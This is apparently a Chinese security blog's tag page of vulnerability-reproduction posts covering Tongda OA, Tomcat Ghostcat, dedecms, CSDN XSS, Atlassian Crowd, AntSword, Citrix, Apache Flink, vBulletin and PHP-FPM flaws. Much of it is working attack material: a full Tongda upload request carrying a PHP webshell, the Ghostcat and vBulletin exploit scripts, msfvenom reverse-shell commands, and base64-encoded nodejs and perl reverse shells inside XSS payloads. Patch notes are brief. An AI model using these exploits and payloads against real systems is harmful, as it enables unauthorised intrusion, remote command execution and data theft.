Tag:漏洞重现

Tag (漏洞重现)'s result:

通达(tongda)OA文件上传和文件包含漏洞重现及分析

0x00 概述 20200317,网上爆出通达oa被利用0day中勒索病毒的消息,官方已出漏洞补丁。 该0day为利用文件上传和文件包含组合利用进行RCE,无须认证。   0x01 影响范围 2013,2013增强版,2015,2016,2017,v11 //补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁   0x02 漏洞重现 利用v11版本: 文件包含漏洞 http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log   文件上传漏洞 上传文件路径在非webroot目录,如: “D:\MYOA\attach\im\2003\ddd.test.jpg” 请求数据包: POST /ispirit/im/upload.php HTTP/1.1 Host: 127.0.0.1 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 633 Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”P” x –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”UPLOAD_MODE” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”DEST_UID” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”ATTACHMENT”; filename=”test07.jpg” Content-Type: image/jpeg <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> –ee65cd98fdbee896acd30a7b2552b6b5– 再利用文件包含执行php代码 json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami 或者这样包含也行 http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg //实测无法直接执行phpinfo(); 利用windows的com组件绕过disable_function() <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>   0x03 修复方案 打补丁   0x04 漏洞分析 PHP Zend 5.4解密php文件即可 文件上传漏洞分析 upload.php:5 $P = $_POST[‘P’]; if (isset($P) || $P != ”) { ob_start(); include_once ‘inc/session.php’; session_id($P); session_start(); session_write_close(); } else { include_once ‘./auth.php’; } 要有P参数否则会经过auth.php登录验证,不为空即可。 $DEST_UID = $_POST[‘DEST_UID’]; $dataBack = array(); if ($DEST_UID != ” && !td_verify_ids($ids)) { $dataBack = array(‘status’ => 0, ‘content’ => ‘-ERR ‘ . _(‘½ÓÊÕ·½IDÎÞЧ’)); echo json_encode(data2utf8($dataBack)); exit;……

Tomcat AJP 文件读取/包含漏洞(CVE-2020-1938 )重现及分析

0x00 概述 202002,网上曝出tomcat ajp的文件读取/包含漏洞。 Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 —https://www.chaitin.cn/zh/ghostcat   0x01 影响范围 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 0x02 漏洞重现 1】 xray   去掉.100的注释,攻击也失败。   2】 Python版 https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 文件读取 文件包含 //修改源码,加上jsp后缀即可文件包含 #!/usr/bin/env python #CNVD-2020-10487 Tomcat-Ajp lfi #by ydhcui import struct   # Some references: # https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html def pack_string(s): if s is None: return struct.pack(“>h”, -1) l = len(s) return struct.pack(“>H%dsb” % l, l, s.encode(‘utf8’), 0) def unpack(stream, fmt): size = struct.calcsize(fmt) buf = stream.read(size) return struct.unpack(fmt, buf) def unpack_string(stream): size, = unpack(stream, “>h”) if size == -1: # null string return None res, = unpack(stream, “%ds” % size) stream.read(1) # \0 return res class NotFoundException(Exception): pass class AjpBodyRequest(object): # server == web server, container == servlet SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) MAX_REQUEST_LENGTH = 8186 def __init__(self, data_stream, data_len, data_direction=None): self.data_stream = data_stream self.data_len = data_len self.data_direction = data_direction def serialize(self): data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) if len(data) ==……

dedecms rce cve-2018-20129漏洞重现

一个鸡肋的老洞,具体分析见: https://www.anquanke.com/post/id/168458 https://xz.aliyun.com/t/1976 https://www.jianshu.com/p/b0eb694be4ac   大概原理: 管理员登录,会员功能开启,利用编辑器上传图片过滤不严,正则替换%,*,?等字符为空,可被利用绕过过滤(如zxc.jpg.p%hp,zxc.jpg?ph%p,zxc.jpg.p?hp) //据说要用构造图片马避免渲染失效,但是本人当时好像直接传常规图片马即可……   漏洞文件: select_images_post.php 关键代码: <?php /** * 图片选择 * * @version $Id: select_images_post.php 1 9:43 2010年7月8日Z tianya $ * @package DedeCMS.Dialog * @copyright Copyright (c) 2007 – 2010, DesDev, Inc. * @license http://help.dedecms.com/usersguide/license.html * @link http://www.dedecms.com */ require_once(dirname(__FILE__).”/config.php”); require_once(dirname(__FILE__).”/../image.func.php”); if(empty($activepath)) { $activepath =”; $activepath = str_replace(‘.’, ”, $activepath); $activepath = preg_replace(“#\/{1,}#”, ‘/’, $activepath); if(strlen($activepath) < strlen($cfg_image_dir)) { $activepath = $cfg_image_dir; } } if(empty($imgfile)) { $imgfile=”; } if(!is_uploaded_file($imgfile)) { ShowMsg(“你没有选择上传的文件!”.$imgfile, “-1”); exit(); } $CKEditorFuncNum = (isset($CKEditorFuncNum))? $CKEditorFuncNum : 1; $imgfile_name = trim(preg_replace(“#[ \r\n\t\*\%\\\/\?><\|\”:]{1,}#”, ”, $imgfile_name)); if(!preg_match(“#\.(“.$cfg_imgtype.”)#i”, $imgfile_name)) { ShowMsg(“你所上传的图片类型不在许可列表,请更改系统对扩展名限定的配置!”, “-1”); exit(); } $nowtme = time(); $sparr = Array(“image/pjpeg”, “image/jpeg”, “image/gif”, “image/png”, “image/xpng”, “image/wbmp”); $imgfile_type = strtolower(trim($imgfile_type)); if(!in_array($imgfile_type, $sparr)) { ShowMsg(“上传的图片格式错误,请使用JPEG、GIF、PNG、WBMP格式的其中一种!”,”-1″); exit(); } $mdir = MyDate($cfg_addon_savetype, $nowtme); if(!is_dir($cfg_basedir.$activepath.”/$mdir”)) { MkdirAll($cfg_basedir.$activepath.”/$mdir”,$cfg_dir_purview); CloseFtp(); } $filename_name = $cuserLogin->getUserID().’-‘.dd2char(MyDate(“ymdHis”, $nowtme).mt_rand(100,999)); $filename = $mdir.’/’.$filename_name; $fs = explode(‘.’, $imgfile_name); $filename = $filename.’.’.$fs[count($fs)-1]; $filename_name = $filename_name.’.’.$fs[count($fs)-1]; $fullfilename = $cfg_basedir.$activepath.”/”.$filename; move_uploaded_file($imgfile, $fullfilename) or die(“上传文件到 $fullfilename 失败!”); if($cfg_remote_site==’Y’ && $remoteuploads == 1) { //分析远程文件路径 $remotefile = str_replace(DEDEROOT, ”, $fullfilename); $localfile = ‘../..’.$remotefile; //创建远程文件夹……

CSDN 存储型XSS分析

20190724,网上传出csdn貌似有存储型XSS,弹框链接: https://bbs.csdn.net/topics/390816889 解码是”提交成功” 搜索这个词 抓包判断该post包触发弹窗 尝试修改响应包 请求 https://bbs.csdn.net/topics/390816889 会发请求 GET /redisData/baiduLandingWord?url=https://bbs.csdn.net/topics/390816889&size=1 HTTP/1.1 Host: redisdatarecall.csdn.net Connection: close Accept: application/json, text/javascript, */*; q=0.01 Origin: https://bbs.csdn.net User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Referer: https://bbs.csdn.net/topics/390816889 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 这个请求是在百度站内查询 再请求,将查询内容写入redis 再请求,返回了推荐的关联帖子的内容,内容(‘提交成功’)经过了html实体编码,引号还原了。(不确定……) 该返回造成弹窗。 触发流程: 1.发布帖子写入payload(如Response.Write(“<script>alert(‘提交成功!’);window.location.href=window.location.href;window.opener.location=window.opener.location;</script>”);) 2.百度搜索引擎爬到该payload帖子。 3.某相关话题帖子推荐到payload帖子,加载到某相关话题帖子的页面。 4.触发payload。   相关链接 https://redisdatarecall.csdn.net/redisData/baiduLandingWord?url=https://bbs.csdn.net/topics/390816889&size=1 https://event.csdn.net/logstores/csdn-pc-tracking-page-exposure/track https://zhannei-dm.csdn.net/recommend/baidu_zhannei_search?keyword=%E5%85%B3%E4%BA%8Ewindow.location.href%E7%9A%84xss https://recsidebar.csdn.net/getSideBarRecommend.html   不确定分析的对不对,如有错漏,强烈建议指出…….

Atlassian Crowd and Crowd Data Center RCE 漏洞重现(CVE-2019-11580)

201907,网上爆出Atlassian Crowd and Crowd Data Center RCE 漏洞,重现一下。     curl -k -H “Content-Type: multipart/mixed” \ –form “file_cdl=@rce.jar” http://10.10.20.166:8095/crowd/admin/uploadplugin.action Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-1059463178748466378rce.jar https://github.com/jas502n/CVE-2019-11580  

antsword xss漏洞重现

0x00 概述 20190412,antsword的github上有个issus https://github.com/AntSwordProject/antSword/issues/147 因为toastr错误信息以html返回并且没有严格过滤导致xss,新版本修复不支持html。 比较有趣,重现一下   0x01 漏洞重现 环境:win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5 1) XSS xss webshell: <?php header(‘HTTP/1.1 500 <img src=# onerror=alert`x`>’);   2) RCE win+nodejs 成功反弹shell。 var net = require(“net”), sh = require(“child_process”).exec(“cmd.exe”); var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?>   未成功的组合: win+perl perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ # Win 平台 perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLU1JTyAtZSBcJiMzOTskYz1uZXcgSU86OlNvY2tldDo6SU5FVChQZWVyQWRkciwiMTI3LjAuMC4xOjY2NzciKTtTVERJTi0mZ3Q7ZmRvcGVuKCRjLHIpOyR+LSZndDtmZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGUmbHQ7Jmd0OztcJiMzOTsmIzM5OywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0mZ3Q7ew0KICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOw0KICB9KTs=`,`base64`).toString())’>”); ?> require(‘child_process’).exec(‘perl -MIO -e \’$c=new IO::Socket::INET(PeerAddr,”127.0.0.1:6677″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); Linux+perl 反弹 未测试 require(‘child_process’).exec(‘perl -e \’use Socket;$i=”127.0.0.1″;$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLWUgXCYjMzk7dXNlIFNvY2tldDskaT0iMTI3LjAuMC4xIjskcD02Njc3O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCImZ3Q7JlMiKTtvcGVuKFNURE9VVCwiJmd0OyZTIik7b3BlbihTVERFUlIsIiZndDsmUyIpO2V4ZWMoIi9iaW4vYmFzaCAtaSIpO307XCYjMzk7JiMzOTssKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9Jmd0O3sNCiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsNCiAgfSk7`,`base64`).toString())’>”); ?> Linux+nodejs 未测试 var net = require(“net”), sh = require(“child_process”).exec(“/bin/bash”);var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCIvYmluL2Jhc2giKTt2YXIgY2xpZW50ID0gbmV3IG5ldC5Tb2NrZXQoKTsNCmNsaWVudC5jb25uZWN0KDY2NzcsICIxMjcuMC4wLjEiLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpOw0Kc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?> var Process = window.parent.top.process.binding(‘process_wrap’).Process;var proc = new Process(); proc.onexit = function (a, b) {};var env = window.parent.top.process.env;var env_ = [];for (var key in env) env_.push(key + ‘=’ + env[key]); proc.spawn({ file: ‘cmd.exe’, args: [‘/k……

citrix netscaler网关RCE漏洞重现及分析(CVE-2019-19781)

0x00 概述 201912,网上爆出citrix网管的rce漏洞,具体细节已公开(20200111),此漏洞无需身份验证,影响较大(8w)。首先利用目录穿越(有限文件读取)写入恶意xml文件到特定目录,再利用模板解析造成rce。   0x01 漏洞重现       0x02 修复方案 参考官方 https://support.citrix.com/article/CTX267027   0x03 漏洞分析 //图片来自https://twitter.com/mpgn_x64 从HTTP_NSC_USER获取$username,变量的过滤被注释了…… UsersPrefs perl module: 所以攻击者可以控制$username,作为后续的xml文件名,比如设置成../../some/path造成目录穿越,导致写入到任意目录(./portal/templates/) 而且这个xml内容的title和desc可控 //所有调用这个csd方法的脚本(几乎所有)都会造成目录穿越,如新建书签。 newbm.pl : my $cgi = new CGI;print “Content-type: text/html\n\n”; my $user = NetScaler::Portal::UserPrefs->new(); my $doc = $user->csd(); … my $newurl = Encode::decode(‘utf8’, $cgi->param(‘url’)); my $newtitle = Encode::decode(‘utf8’, $cgi->param(‘title’)); my $newdesc = Encode::decode(‘utf8’, $cgi->param(‘desc’)); my $UI_inuse = Encode::decode(‘utf8’, $cgi->param(‘UI_inuse’)); … my $newBM = { url => $newurl, title => $newtitle, descr => $newdesc, UI_inuse => $UI_inuse, }; … if ($newBM->{url} =~ /^\/){ push @{$doc->{filesystems}->{filesystem}}, $newBM; } else { # bookmark push @{$doc->{bookmarks}->{bookmark}}, $newBM; }// Writing XML file to disk $user->filewrite($doc); 调用filewrite方法写入一些数据到$doc,即可控的文件名($username)。 当恶意的xml文件(Perl Template Toolkit)写入到./portal/templates/这个目录下,利用GET请求/vpn/../vpns/portal/zxcxz.xml就可以使模板工具包引擎加载解析这个恶意xml文件造成rce。 $doc就是$username,$tmplfile变量是从HTTP请求路径构造的,并为该文件构建并处理了一个新模板。   0x04 参考资料 https://twitter.com/mpgn_x64 https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/ https://github.com/jas502n/CVE-2019-19781

Apache flink任意jar上传导致rce漏洞重现

0x00 概述 20191111,网上爆出Apache Flink上传jar包导致远程代码执行的漏洞(安全工程师Henry Chen披露)。因为Apache Flink Dashboard 默认无需认证即可访问,所以可以上传恶意jar包并触发恶意代码执行,从而getshell。 影响范围<= 1.9.1   0x01 漏洞重现 “apache-flink-dashboard” 1)利用MSF msfvenom -p java/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=7766 W >poc.jar 2)利用nc msfvenom -p java/shell_reverse_tcp lhost=1.2.3.4 lport=7766 -f jar > poc.jar   0x02 防御方案 1.设置防火墙策略,仅允许白名单ip访问 apache flink。 2.Web代理(如apache httpd)中增加对该服务的digest认证。 3.关注官网新版本或补丁更新。        

vBulletin 5.x 0day pre-auth RCE漏洞重现

0x00 概述 201909 vbulletin5(5.0.0-5.5.4)爆出rce漏洞,利用文件ajax/render/widget_php和post参数widgetConfig[code]可直接远程代码执行。   0x01 漏洞重现 https://seclists.org/fulldisclosure/2019/Sep/31 #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # – site:*.vbulletin.net # – “Powered by vBulletin Version 5.5.4”   import requests import sys   if len(sys.argv) != 2: sys.exit(“Usage: %s <URL to vBulletin>” % sys.argv[0])   params = {“routestring”:”ajax/render/widget_php”}   while True: try: cmd = raw_input(“vBulletin$ “) params[“widgetConfig[code]”] = “echo shell_exec(‘”+cmd+”‘); exit;” r = requests.post(url = sys.argv[1], data = params) if r.status_code == 200: print r.text else: sys.exit(“Exploit failed! :(“) except KeyboardInterrupt: sys.exit(“\nClosing shell…”) except Exception, e: sys.exit(str(e))   0x02 检测工具 https://github.com/theLSA/vbulletin5-rce   0x03 修复方案 打补丁。    

PHP+nginx RCE(CVE-2019-11043)漏洞重现

0x00 概述 来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。 当Nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。当fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大。 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致nginx传递给php-fpm的 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷,所以攻击者可以使用换行符(%0a)来破坏`fastcgi_split_path_info`指令中的Regexp。 Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。   0x01 影响范围 当Nginx + php-fpm 的服务器有如下配置的时候,都会出现RCE漏洞 location ~ [^/]\.php(/|$) { fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO       $fastcgi_path_info; fastcgi_pass   php:9000; … } } 5.6 crash 7 rce   0x02 漏洞重现 https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md https://github.com/neex/phuip-fpizdam //go install //go get -v //go build     https://github.com/search?q=fastcgi_split_path&type=Code 某大神分享的nextcloud案例: https://docs.nextcloud.com/server/17/admin_manual/installation/nginx.html https://www.zoomeye.org/searchResult?q=nextcloud+%2Bserver:Nginx+%2B&t=all   0x03 数据流量 据说这个exp写得十分精妙。   0x04 修复方案 根据需求,将以下配置删除 fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO       $fastcgi_path_info; or 补丁 https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest   0x05 结语 还是有不少这样配置的,影响较大。   0x06 参考资料 https://mp.weixin.qq.com/s?src=11&timestamp=1572095484&ver=1936&signature=oPmPaXehqGEgAHy6nc0mARQbu5NbL-3GTFrbcxQghC4qvehLlpE9ohw6uTuP0hwcmtOvA3mZWUXhOEImDu0*ltYMJmrMrb-ATqNxOqEMYmV7yV4ntWOQl2JYrhx4*MQ2&new=1